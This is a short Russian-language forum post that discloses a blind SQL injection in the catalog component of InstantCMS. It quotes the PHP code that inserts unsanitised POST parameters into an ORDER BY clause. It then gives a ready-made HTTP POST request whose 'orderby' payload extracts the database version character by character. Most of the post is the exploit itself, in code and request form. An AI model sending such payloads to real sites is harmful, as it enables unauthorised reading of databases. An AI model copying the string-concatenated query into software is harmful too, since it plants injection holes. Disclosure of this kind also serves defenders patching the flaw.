27.03.2010, 01:48
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Blind SQL-Injection
Blind SQL-Injection
/componets/catalog/fronted.php
PHP код:
if (isset($_POST['orderby'])) {
$orderby = $_POST['orderby'];
...
}
if (isset($_POST['orderto'])) {
$orderto = $_POST['orderto'];
...
}
$sql .= " ORDER BY ".$orderby." ".$orderto;
$result = $inDB->query($sql);
Код:
POST http://instantcms/catalog/23/1 HTTP/1.0
Host: instantcms
Content-Type: application/x-www-form-urlencoded
Content-length: 65
orderby=(i.id* IF (ASCII(SUBSTRING(version(),1,1))=53,1,-1)) --
Последний раз редактировалось Sc0rpi0n; 05.06.2010 в 01:45..
|
|
|